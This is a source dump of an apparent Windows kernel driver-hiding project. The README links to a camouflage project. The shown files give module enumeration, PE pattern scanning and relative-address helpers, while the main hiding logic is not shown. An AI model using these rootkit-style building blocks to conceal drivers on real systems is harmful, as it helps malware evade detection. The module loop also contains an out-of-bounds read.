函数会触发异常的问题,并重写了功能相同的函数; 4 | 5 | 2......记不得了; 6 | 7 | 8 | 9 | 符号解析器:[Oxygen1a1/oxgenPdb: a Windows kernel Pdb parsing and downloading library that runs purely in kernel mode without any R3 programs. 
(github.com)](https://github.com/Oxygen1a1/oxgenPdb) 10 | 11 | 原隐藏傀儡项目:[IcEy-999/Drv_Hide_And_Camouflage (github.com)](https://github.com/IcEy-999/Drv_Hide_And_Camouflage) 12 | -------------------------------------------------------------------------------- /main.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/main.c -------------------------------------------------------------------------------- /oxygenPdb.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | 5 | #include 6 | 7 | 8 | namespace oxygenPdb { 9 | 10 | class Pdber { 11 | 12 | public: 13 | Pdber(const wchar_t* moduleName); 14 | bool init(); 15 | ~Pdber(); 16 | ULONG_PTR GetPointer(const char* name); 17 | size_t GetOffset(const char* structName, const char* propertyName); 18 | private: 19 | char padding[1000];//can not revise this!!! else it will ocurrs stack overflow!! 
20 | }; 21 | 22 | } 23 | -------------------------------------------------------------------------------- /oxygenpdb.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/oxygenpdb.lib -------------------------------------------------------------------------------- /tools.c: -------------------------------------------------------------------------------- 1 | #include "tools.h" 2 | #include 3 | #include 4 | 5 | UINT64 _strcmp_a(LPSTR s1, LPSTR s2) 6 | { 7 | char c1, c2; 8 | 9 | if (s1 == s2) 10 | return 0; 11 | 12 | if (s1 == 0) 13 | return (UINT64)-1; 14 | 15 | if (s2 == 0) 16 | return 1; 17 | 18 | do { 19 | c1 = *s1; 20 | c2 = *s2; 21 | s1++; 22 | s2++; 23 | } while ((c1 != 0) && ((c1 | 0x20) == (c2 | 0x20))); 24 | 25 | return (int)((INT64)(c1 | 0x20) - (c2 | 0x20)); 26 | } 27 | 28 | UINT64 strfind(LPSTR str1, LPSTR str2) { 29 | UINT64 str2len = strlen(str2); 30 | UINT64 str1len = strlen(str1); 31 | char temp; 32 | if (str1len > str2len) { 33 | for (UINT64 i = 0; i <= str1len - str2len; i++) { 34 | temp = str1[str2len + i]; 35 | str1[str2len + i] = 0; 36 | if (_strcmp_a(&str1[i], str2) == 0) { 37 | return i; 38 | } 39 | 40 | str1[str2len + i] = temp; 41 | } 42 | } 43 | return (UINT64)-1; 44 | } 45 | 46 | 47 | EXTERN_C RTL_PROCESS_MODULE_INFORMATION GetSystemModuleInfo(LPSTR ModuleName) { 48 | ULONG BufferSizeNeed = 0; 49 | RTL_PROCESS_MODULE_INFORMATION ret; 50 | PRTL_PROCESS_MODULES Buffer = 0; 51 | NTSTATUS status; 52 | INT T; 53 | RtlZeroMemory(&ret, sizeof(ret)); 54 | 55 | __try { 56 | status = NtQuerySystemInformation(11, &BufferSizeNeed, BufferSizeNeed, &BufferSizeNeed); 57 | Buffer = ExAllocatePoolWithTag(NonPagedPool, BufferSizeNeed, 35353535); 58 | if (Buffer) { 59 | status = NtQuerySystemInformation(11, Buffer, BufferSizeNeed, &BufferSizeNeed); 60 | 61 | if (NT_SUCCESS(status)) { 62 | T = Buffer->NumberOfModules; 63 | 
while ((T--) >= 0) { 64 | if ((INT64)Buffer->Modules[T].ImageBase != 0x140000000 && strfind(Buffer->Modules[T].FullPathName, ModuleName) != -1) { 65 | ret = Buffer->Modules[T]; 66 | break; 67 | } 68 | if (T == 0) ret.ImageBase = 0; 69 | } 70 | } 71 | ExFreePoolWithTag(Buffer, 0); 72 | } 73 | } 74 | __except (EXCEPTION_EXECUTE_HANDLER) { 75 | 76 | } 77 | return ret; 78 | } 79 | 80 | BOOLEAN CheckMask(CHAR* base, CHAR* pattern, CHAR* mask) 81 | { 82 | for (; *mask; ++base, ++pattern, ++mask) 83 | { 84 | if ('x' == *mask && *base != *pattern) 85 | { 86 | return FALSE; 87 | } 88 | } 89 | return TRUE; 90 | } 91 | 92 | 93 | PVOID FindPattern(PVOID base, INT length, CHAR* pattern, CHAR* mask) 94 | { 95 | length -= (INT)(strlen(mask)); 96 | for (INT i = 0; i <= length; ++i) 97 | { 98 | CHAR* data = (CHAR*)base; 99 | PVOID address = &data[i]; 100 | if (CheckMask(address, pattern, mask)) 101 | return address; 102 | } 103 | return NULL; 104 | } 105 | 106 | EXTERN_C PVOID FindPatternImage(PVOID base, CHAR* pattern, CHAR* mask) 107 | { 108 | PVOID match = 0; 109 | PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS)((CHAR*)base + ((PIMAGE_DOS_HEADER)base)->e_lfanew); 110 | PIMAGE_SECTION_HEADER sections = IMAGE_FIRST_SECTION(headers); 111 | for (ULONG64 i = 0; i < headers->FileHeader.NumberOfSections; ++i) { 112 | PIMAGE_SECTION_HEADER section = §ions[i]; 113 | if ('EGAP' == *(PINT64)section->Name || memcmp(section->Name, ".text", 5) == 0) { 114 | match = FindPattern((CHAR*)base + section->VirtualAddress, section->Misc.VirtualSize, pattern, mask); 115 | if (match) 116 | { 117 | break; 118 | } 119 | } 120 | } 121 | return match; 122 | } 123 | -------------------------------------------------------------------------------- /tools.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | typedef struct _RTL_PROCESS_MODULE_INFORMATION { 4 | HANDLE Section; 5 | PVOID MappedBase; 6 | PVOID ImageBase; 7 | ULONG ImageSize; 8 | 
/* Remaining fields of RTL_PROCESS_MODULE_INFORMATION (the struct opens in the
 * tools.h text above). Only FullPathName and ImageBase are used by the code
 * in this listing. */
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;   /* presumably the offset of the file name inside FullPathName -- not used here */
CHAR FullPathName[256];    /* GetSystemModuleInfo substring-matches its ModuleName argument against this */
} RTL_PROCESS_MODULE_INFORMATION, * PRTL_PROCESS_MODULE_INFORMATION;

/*
 * Variable-length module list: NumberOfModules entries follow the count, of
 * which only the first is declared (Windows-style trailing array, so the
 * struct is always heap-allocated and never copied by value). Valid indices
 * are 0 .. NumberOfModules - 1, and only after the query that filled the
 * buffer succeeded; the SystemModuleInformation class below is the one this
 * layout is written for (the call site is in GetSystemModuleInfo, outside
 * this listing).
 */
typedef struct _RTL_PROCESS_MODULES {
	ULONG NumberOfModules;
	RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES, * PRTL_PROCESS_MODULES;


/*
 * Information classes for NtQuerySystemInformation (declared below). This is
 * the project's own copy of the class numbering; the numbering and the buffer
 * layouts behind the undocumented classes vary between Windows builds, so a
 * value should be verified against the build being targeted before use.
 */
typedef enum _SYSTEM_INFORMATION_CLASS
{
	SystemBasicInformation = 0x0,
	SystemProcessorInformation = 0x1,
	SystemPerformanceInformation = 0x2,
	SystemTimeOfDayInformation = 0x3,
	SystemPathInformation = 0x4,
	SystemProcessInformation = 0x5,
	SystemCallCountInformation = 0x6,
	SystemDeviceInformation = 0x7,
	SystemProcessorPerformanceInformation = 0x8,
	SystemFlagsInformation = 0x9,
	SystemCallTimeInformation = 0xa,
	SystemModuleInformation = 0xb,   /* returns an RTL_PROCESS_MODULES buffer (see above) */
	SystemLocksInformation = 0xc,
	SystemStackTraceInformation = 0xd,
	SystemPagedPoolInformation = 0xe,
	SystemNonPagedPoolInformation = 0xf,
	SystemHandleInformation = 0x10,
	SystemObjectInformation = 0x11,
	SystemPageFileInformation = 0x12,
	SystemVdmInstemulInformation = 0x13,
	SystemVdmBopInformation = 0x14,
	SystemFileCacheInformation = 0x15,
	SystemPoolTagInformation = 0x16,
	SystemInterruptInformation = 0x17,
	SystemDpcBehaviorInformation = 0x18,
	SystemFullMemoryInformation = 0x19,
	SystemLoadGdiDriverInformation = 0x1a,
	SystemUnloadGdiDriverInformation = 0x1b,
	SystemTimeAdjustmentInformation = 0x1c,
	SystemSummaryMemoryInformation = 0x1d,
	SystemMirrorMemoryInformation = 0x1e,
	SystemPerformanceTraceInformation = 0x1f,
	SystemObsolete0 = 0x20,
	SystemExceptionInformation = 0x21,
	SystemCrashDumpStateInformation = 0x22,
	SystemKernelDebuggerInformation = 0x23,
	SystemContextSwitchInformation = 0x24,
	SystemRegistryQuotaInformation = 0x25,
	SystemExtendServiceTableInformation = 0x26,
	SystemPrioritySeperation = 0x27,
	SystemVerifierAddDriverInformation = 0x28,
	SystemVerifierRemoveDriverInformation = 0x29,
	SystemProcessorIdleInformation = 0x2a,
	SystemLegacyDriverInformation = 0x2b,
	SystemCurrentTimeZoneInformation = 0x2c,
	SystemLookasideInformation = 0x2d,
	SystemTimeSlipNotification = 0x2e,
	SystemSessionCreate = 0x2f,
	SystemSessionDetach = 0x30,
	SystemSessionInformation = 0x31,
	SystemRangeStartInformation = 0x32,
	SystemVerifierInformation = 0x33,
	SystemVerifierThunkExtend = 0x34,
	SystemSessionProcessInformation = 0x35,
	SystemLoadGdiDriverInSystemSpace = 0x36,
	SystemNumaProcessorMap = 0x37,
	SystemPrefetcherInformation = 0x38,
	SystemExtendedProcessInformation = 0x39,
	SystemRecommendedSharedDataAlignment = 0x3a,
	SystemComPlusPackage = 0x3b,
	SystemNumaAvailableMemory = 0x3c,
	SystemProcessorPowerInformation = 0x3d,
	SystemEmulationBasicInformation = 0x3e,
	SystemEmulationProcessorInformation = 0x3f,
	SystemExtendedHandleInformation = 0x40,
	SystemLostDelayedWriteInformation = 0x41,
	SystemBigPoolInformation = 0x42,
	SystemSessionPoolTagInformation = 0x43,
	SystemSessionMappedViewInformation = 0x44,
	SystemHotpatchInformation = 0x45,
	SystemObjectSecurityMode = 0x46,
	SystemWatchdogTimerHandler = 0x47,
	SystemWatchdogTimerInformation = 0x48,
	SystemLogicalProcessorInformation = 0x49,
	SystemWow64SharedInformationObsolete = 0x4a,
	SystemRegisterFirmwareTableInformationHandler = 0x4b,
	SystemFirmwareTableInformation = 0x4c,
	SystemModuleInformationEx = 0x4d,
	SystemVerifierTriageInformation = 0x4e,
	SystemSuperfetchInformation = 0x4f,
	SystemMemoryListInformation = 0x50,
	SystemFileCacheInformationEx = 0x51,
	SystemThreadPriorityClientIdInformation = 0x52,
	SystemProcessorIdleCycleTimeInformation = 0x53,
	SystemVerifierCancellationInformation = 0x54,
	SystemProcessorPowerInformationEx = 0x55,
	SystemRefTraceInformation = 0x56,
	SystemSpecialPoolInformation = 0x57,
	SystemProcessIdInformation = 0x58,
	SystemErrorPortInformation = 0x59,
	SystemBootEnvironmentInformation = 0x5a,
	SystemHypervisorInformation = 0x5b,
	SystemVerifierInformationEx = 0x5c,
	SystemTimeZoneInformation = 0x5d,
	SystemImageFileExecutionOptionsInformation = 0x5e,
	SystemCoverageInformation = 0x5f,
	SystemPrefetchPatchInformation = 0x60,
	SystemVerifierFaultsInformation = 0x61,
	SystemSystemPartitionInformation = 0x62,
	SystemSystemDiskInformation = 0x63,
	SystemProcessorPerformanceDistribution = 0x64,
	SystemNumaProximityNodeInformation = 0x65,
	SystemDynamicTimeZoneInformation = 0x66,
	SystemCodeIntegrityInformation = 0x67,
	SystemProcessorMicrocodeUpdateInformation = 0x68,
	SystemProcessorBrandString = 0x69,
	SystemVirtualAddressInformation = 0x6a,
	SystemLogicalProcessorAndGroupInformation = 0x6b,
	SystemProcessorCycleTimeInformation = 0x6c,
	SystemStoreInformation = 0x6d,
	SystemRegistryAppendString = 0x6e,
	SystemAitSamplingValue = 0x6f,
	SystemVhdBootInformation = 0x70,
	SystemCpuQuotaInformation = 0x71,
	SystemNativeBasicInformation = 0x72,
	SystemErrorPortTimeouts = 0x73,
	SystemLowPriorityIoInformation = 0x74,
	SystemBootEntropyInformation = 0x75,
	SystemVerifierCountersInformation = 0x76,
	SystemPagedPoolInformationEx = 0x77,
	SystemSystemPtesInformationEx = 0x78,
	SystemNodeDistanceInformation = 0x79,
	SystemAcpiAuditInformation = 0x7a,
	SystemBasicPerformanceInformation = 0x7b,
	SystemQueryPerformanceCounterInformation = 0x7c,
	SystemSessionBigPoolInformation = 0x7d,
	SystemBootGraphicsInformation = 0x7e,
	SystemScrubPhysicalMemoryInformation = 0x7f,
	SystemBadPageInformation = 0x80,
	SystemProcessorProfileControlArea = 0x81,
	SystemCombinePhysicalMemoryInformation = 0x82,
	SystemEntropyInterruptTimingInformation = 0x83,
	SystemConsoleInformation = 0x84,
	SystemPlatformBinaryInformation = 0x85,
	SystemThrottleNotificationInformation = 0x86,
	SystemHypervisorProcessorCountInformation = 0x87,
	SystemDeviceDataInformation = 0x88,
	SystemDeviceDataEnumerationInformation = 0x89,
	SystemMemoryTopologyInformation = 0x8a,
	SystemMemoryChannelInformation = 0x8b,
	SystemBootLogoInformation = 0x8c,
	SystemProcessorPerformanceInformationEx = 0x8d,
	SystemSpare0 = 0x8e,
	SystemSecureBootPolicyInformation = 0x8f,
	SystemPageFileInformationEx = 0x90,
	SystemSecureBootInformation = 0x91,
	SystemEntropyInterruptTimingRawInformation = 0x92,
	SystemPortableWorkspaceEfiLauncherInformation = 0x93,
	SystemFullProcessInformation = 0x94,
	SystemKernelDebuggerInformationEx = 0x95,
	SystemBootMetadataInformation = 0x96,
	SystemSoftRebootInformation = 0x97,
	SystemElamCertificateInformation = 0x98,
	SystemOfflineDumpConfigInformation = 0x99,
	SystemProcessorFeaturesInformation = 0x9a,
	SystemRegistryReconciliationInformation = 0x9b,
	MaxSystemInfoClass = 0x9c,   /* one past the last class this copy knows about */
} SYSTEM_INFORMATION_CLASS;

/* Kernel export, only partially documented; this prototype is the project's
 * own declaration. Callers must check the returned NTSTATUS and size the
 * buffer from ReturnLength before reading SystemInformation. */
EXTERN_C NTKERNELAPI NTSTATUS NtQuerySystemInformation(_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength);
/* Returns, by value, the module entry whose FullPathName contains ModuleName
 * (entries with ImageBase 0x140000000 are skipped; the reason is not stated in
 * the code). ImageBase == 0 in the result means no module matched or the walk
 * faulted. Defined in tools.c. */
EXTERN_C RTL_PROCESS_MODULE_INFORMATION GetSystemModuleInfo(LPSTR ModuleName);
/* Scans the PAGE and .text sections of the fully mapped PE image at base for
 * the masked byte pattern; NULL when no match. Defined in tools.c. */
EXTERN_C PVOID FindPatternImage(PVOID base, CHAR* pattern, CHAR* mask);

/* Resolves a rel32-style operand: `size` is the instruction length, the signed
 * 32-bit displacement occupies its last four bytes, and the result is the
 * address of the following instruction plus that displacement. `address` must
 * be readable for `size` bytes; the macro performs no validation and evaluates
 * `address` and `size` more than once, so pass side-effect-free expressions. */
#define RELATIVE_ADDRESS(address, size) ((VOID*)((UINT8*)(address) + *(INT32*)((UINT8*)(address) + ((size) - (INT32)sizeof(INT32))) + (size)))
--------------------------------------------------------------------------------